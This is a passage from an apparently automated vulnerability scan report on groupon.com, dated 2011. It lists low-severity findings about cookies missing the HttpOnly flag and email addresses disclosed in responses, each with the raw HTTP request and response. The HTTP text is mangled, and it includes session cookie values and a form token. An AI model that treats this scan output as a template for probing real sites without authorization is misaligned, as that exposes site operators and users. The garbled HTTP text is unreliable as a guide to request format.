GET /merchants/welcome HTTP/1.1.com//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fliveoffgroupon.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.21.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: _tpref=http%3A%2F%2Fwww.grouponworks.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:01:06 GMT Set-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 12:01:06 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2e0d0571e3cf7eeb9; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:06 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2e7daddb9cb120594; domain=.groupon.com; path=/ 4fedd9ee2bc8af30438c41; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:07 GMT; HttpOnlya2c56d220da1f".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.10. http://www.groupon.com/mobile
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/mobile
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:48 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:48 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/
Request
GET /mobile HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:48 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:48 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:48 GMT; HttpOnlyf1ad4020f211b".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.11. http://www.groupon.com/now
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/now
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:55:29 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2a878fda7a55a2d3f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:29 GMT s=eda0ddd2d57635565704e948; domain=.groupon.com; path=/
Request
GET /now HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.4.9.1313841158728; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:55:29 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2a878fda7a55a2d3f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:29 GMT Set-Cookie: s=eda0ddd2d57635565704e948; domain=.groupon.com; path=/ =true; path=/092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:30 GMT; HttpOnly846336d1724ef".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.12. http://www.groupon.com/pages/affiliates
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/affiliates
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:25 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2835215e7457c8e54; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:25 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2855dfa8cae677beb; domain=.groupon.com; path=/
Request
GET /pages/affiliates HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.10.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:25 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2835215e7457c8e54; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:25 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2855dfa8cae677beb; domain=.groupon.com; path=/ d92a28cd3b4e873e6252c1; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:25 GMT; HttpOnlyd1227d6a90fb1".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.13. http://www.groupon.com/pages/api
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/api
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:50 GMT b=eda0ddd27c71c40daccaaa9e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:50 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/
Request
GET /pages/api HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:50 GMT Set-Cookie: b=eda0ddd27c71c40daccaaa9e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:50 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/ 5f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:50 GMT; HttpOnly43f986276965a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.14. http://www.groupon.com/pages/corporate-gift-cards
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/corporate-gift-cards
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:55 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2cc8aa9390dfe883c; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:55 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd26a6fe44aa18c9a4a; domain=.groupon.com; path=/
Request
GET /pages/corporate-gift-cards HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:55 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2cc8aa9390dfe883c; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:55 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd26a6fe44aa18c9a4a; domain=.groupon.com; path=/ d2786383e597c692d197f2; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:56 GMT; HttpOnly035c008150134".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.15. http://www.groupon.com/pages/groupon-jobs-frameresize
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/groupon-jobs-frameresize
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:_tpref=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:00 GMT division=dallas; path=/; expires=Tue, 20-Sep-2011 12:00:00 GMT b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:00 GMT s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/
Request
GET /pages/groupon-jobs-frameresize?height=2782 HTTP/1.1/CompanyJobs/Careers.aspx?c=qcZ9VfwZ&jvresize=http://www.groupon.com/pages/groupon-jobs-frameresize/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.16.7.1313841243632; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: _tpref=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:00 GMT Set-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 12:00:00 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:00 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ 21726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:00 GMT; HttpOnly23958c6bb2afd".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.16. http://www.groupon.com/personalize
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/personalize
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:52:36 GMT b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:52:36 GMT s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/
Request
GET /personalize?fer=1 HTTP/1.1/dallas/;q=0.3.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.2.9.1313841127; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; _tpref=cdn; adchemy_id=; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; spike_landing_url=http%3A%2F%2Fwww.groupon.com%2Fdallas%2F; division=dallas; visited=visit_2
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:52:36 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:52:36 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ a465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:52:36 GMT; HttpOnlyf420943467717"_to_current_division":false,"subscribed_to_current_channel":false,"is_authenticated":false}
6.17. http://www.groupon.com/press
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/press
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:27 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd29fea6cee6b39ca7d; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:27 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2edb603e5125278ec; domain=.groupon.com; path=/
Request
GET /press HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.3.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:27 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd29fea6cee6b39ca7d; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:27 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2edb603e5125278ec; domain=.groupon.com; path=/ a55f4549b5b6391dde187c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:27 GMT; HttpOnlya39a885430d5a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.18. http://www.groupon.com/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/subscriptions/new
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:54:04 GMT b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:54:04 GMT s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/
Request
GET /subscriptions/new?division_p=dallas HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3-00505695132f; s=cf0d2b32-cb22-11e0-85e8-00505695132f; visited=visit_1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:54:04 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:54:04 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ a465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:54:04 GMT; HttpOnly77d3d62064ebb"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]...
6.19. http://www.groupon.com/users/forgot_password
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/forgot_password
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:56:21 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:21 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/
Request
GET /users/forgot_password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.9.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:56:21 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:21 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/ 1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:21 GMT; HttpOnly308885c322d7e".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.20. http://www.groupon.com/users/send_password_reset
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/send_password_reset
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:scid=email_addresstest%40fastdial.net; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT division=dallas; path=/; expires=Tue, 20-Sep-2011 12:01:42 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd22df6c7a004d88bb; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2773edf5e93a17927; domain=.groupon.com; path=/
Request
POST /users/send_password_reset HTTP/1.1/users/forgot_password-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fwww.grouponworks.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.23.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1_token=r1M203F0Ir4AsHf7OkBQViXsP4HUiV7QpXuxNGPWJbQ%3D&user%5Bemail_address%5D=test%40fastdial.net&commit=Submit
Response
HTTP/1.1 200 OKSet-Cookie: scid=email_addresstest%40fastdial.net; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT Set-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 12:01:42 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd22df6c7a004d88bb; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2773edf5e93a17927; domain=.groupon.com; path=/ cd872c8cf0bdec825095aa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:43 GMT; HttpOnlya29a9aadcf59d".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.21. http://www.groupon.com/widget
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/widget
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:52 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2de699e98101a66c5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:52 GMT s=eda0ddd25a670f2213c27794; domain=.groupon.com; path=/
Request
GET /widget HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:52 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2de699e98101a66c5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:52 GMT Set-Cookie: s=eda0ddd25a670f2213c27794; domain=.groupon.com; path=/ 7ace3326a1196bfa6f3e6a; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:53 GMT; HttpOnly8d9dcab7797d7".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
7. Email addresses disclosed
previous
next
There are 5 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
7.1. http://www.groupon.com/about
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/about
Issue detail
The following email address was disclosed in the response:
Request
GET /about HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:49 GMT-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:49 GMT; HttpOnly86a9ef714ba9a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... support@groupon.com ">...[SNIP]...
7.2. http://www.groupon.com/blog/wp-content/plugins/events-calendar/js/jquery.bgiframe.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/plugins/events-calendar/js/jquery.bgiframe.js
Issue detail
The following email address was disclosed in the response:
Request
GET /blog/wp-content/plugins/events-calendar/js/jquery.bgiframe.js?ver=2.1 HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK.org/licenses/mit-license.php) .org/licenses/gpl-li...[SNIP]... brandon.aaron@gmail.com || http://brandonaaron.net).version) <= 6 ) {...[SNIP]...
7.3. http://www.groupon.com/pages/affiliates
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/affiliates
Issue detail
The following email address was disclosed in the response:
Request
GET /pages/affiliates HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.10.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
